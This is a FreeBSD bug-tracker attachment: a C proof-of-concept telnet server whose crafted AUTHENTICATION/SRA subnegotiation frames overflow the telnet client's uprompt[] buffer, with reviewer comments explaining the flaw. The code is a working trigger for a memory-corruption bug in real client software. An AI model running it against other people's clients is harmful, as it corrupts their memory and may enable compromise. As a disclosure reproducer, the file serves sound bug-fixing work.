FreeBSD Bugzilla – Attachment 240895 Details for
Bug 270263
telnet buffer overflow if server sends long TELQUAL_NAME for sra
telnet server that overflows telnet's uprompt[] in sra_reply()
telnet17d.c (text/plain), 2.68 KB, created by
Robert Morris
on 2023-03-16 10:35:24 UTC
Description:
telnet server that overflows telnet's uprompt[] in sra_reply()
Filename:
MIME Type:
Creator:
Robert Morris
Created:
2023-03-16 10:35:24 UTC
Size:
2.68 KB
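/*
 * Reproducer attached to FreeBSD bug 270263: a single-connection telnet
 * server used to demonstrate that the telnet client mishandles a long
 * AUTHENTICATION subnegotiation for the SRA auth type. Per the bug title,
 * the client-side overflow is in uprompt[] inside sra_reply().
 *
 * What a reviewer of the client should take from this file: the server fully
 * controls the length of the subnegotiation payload (here a 256-byte frame),
 * so the client has to bound every copy out of that payload by the size of
 * its destination buffer.
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ctype.h>
#include <fcntl.h>
#include <signal.h>

/*
 * Constants XORed into the two subnegotiation frames below. main() consumes
 * exactly three entries per frame and sends two frames, i.e. all six entries.
 */
unsigned long long aa[] = {
0x101010101000033ull,
0x101010101010001ull,
0x10101010100ull,
0x30300032ull,
0xcfcfull,
0xc1cfull,
};
int aai; /* next unused index into aa[] */

/* Telnet command bytes. */
#define IAC 255
#define DONT 254
#define DO 253
#define WONT 252
#define WILL 251
#define SB 250
#define SE 240

/* Telnet option codes. */
#define OPT_TTYPE 24
#define OPT_TSPEED 32
#define OPT_LINEMODE 34
#define OPT_XDISPLOC 35
#define OPT_OLD_ENVIRON 36
#define OPT_AUTHENTICATION 37
#define OPT_ENCRYPT 38
#define OPT_NEW_ENVIRON 39
#define OPT_LFLOW 33
#define OPT_NAWS 31

/* AUTHENTICATION subnegotiation qualifiers. */
#define QUAL_IS 0
#define QUAL_SEND 1
#define QUAL_REPLY 2
#define QUAL_NAME 3

/*
 * Accept one client on TCP port 23, negotiate options, then send two
 * AUTHENTICATION subnegotiation frames of 256 bytes each.
 *
 * Returns 0 after the final sleep; exits with status 1 if bind, listen or
 * accept fails.
 */
int
main(void)
{
    struct sockaddr_in sin;
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(23);
    /*
     * sin_addr stays zeroed (INADDR_ANY), so the listener is reachable on
     * every interface of the host, and port 23 needs privileges to bind.
     */

    int ss = socket(AF_INET, SOCK_STREAM, 0);
    int yes = 1;
    setsockopt(ss, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes));
    if (bind(ss, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        perror("bind");
        exit(1);
    }
    if (listen(ss, 10) < 0) {
        perror("listen");
        exit(1);
    }

    memset(&sin, 0, sizeof(sin));
    socklen_t len = sizeof(sin);
    printf("listening...\n");
    int s1 = accept(ss, (struct sockaddr *)&sin, &len);
    if (s1 < 0) {
        perror("accept");
        exit(1);
    }
    /* Only one client is served; stop listening. */
    close(ss);

    {
        /* Give the client a moment, then discard whatever it sent first. */
        sleep(1);
        char buf[512];
        if (read(s1, buf, sizeof(buf)) < 0)
            perror("read");
    }

    {
        /* Option negotiation: everything on except ENCRYPT. */
        char buf[] = {
            IAC, WILL, OPT_AUTHENTICATION,
            IAC, WILL, OPT_TTYPE,
            IAC, WILL, OPT_TSPEED,
            IAC, WILL, OPT_LFLOW,
            IAC, WILL, OPT_LINEMODE,
            IAC, WILL, OPT_XDISPLOC,
            IAC, WILL, OPT_NEW_ENVIRON,
            IAC, WILL, OPT_OLD_ENVIRON,
            IAC, WONT, OPT_ENCRYPT,
            IAC, DO, OPT_AUTHENTICATION,
            IAC, DO, OPT_TTYPE,
            IAC, DO, OPT_TSPEED,
            IAC, DO, OPT_LFLOW,
            IAC, DO, OPT_LINEMODE,
            IAC, DO, OPT_XDISPLOC,
            IAC, DO, OPT_NEW_ENVIRON,
            IAC, DO, OPT_OLD_ENVIRON,
            IAC, DONT, OPT_ENCRYPT,
        };
        write(s1, buf, sizeof(buf));
    }

    for (int iters = 0; iters < 2; iters++) {
        char buf[256];
        memset(buf, '0', sizeof(buf));

        /*
         * NOTE(review): these are unaligned long long accesses through a
         * char buffer; the resulting bytes depend on host byte order and the
         * code relies on the host tolerating unaligned access. Left as
         * submitted so the frame matches the one in the report.
         */
        *(long long *)(buf+3+0) ^= aa[aai++];
        *(long long *)(buf+3+8) ^= aa[aai++];
        *(long long *)(buf+sizeof(buf)-2-8) ^= aa[aai++];

        /* Frame header and trailer: IAC SB AUTHENTICATION ... IAC SE. */
        buf[0] = (char)IAC;
        buf[1] = (char)SB;
        buf[2] = (char)OPT_AUTHENTICATION;
        buf[4] = 6; // sra
        buf[sizeof(buf)-2] = (char)IAC;
        buf[sizeof(buf)-1] = (char)SE;

        if (write(s1, buf, sizeof(buf)) != sizeof(buf))
            perror("write");

        {
            /*
             * Discard the client's answer. The submitted code read up to
             * sizeof(bbb) == 512 bytes into the 256-byte buf, so a client
             * sending more than 256 bytes overflowed this server's stack;
             * read into the 512-byte buffer instead.
             */
            char bbb[512];
            if (read(s1, bbb, sizeof(bbb)) < 0)
                perror("read");
        }
    }

    /* Keep the connection open while the client processes the frames. */
    sleep(10);
    return 0;
}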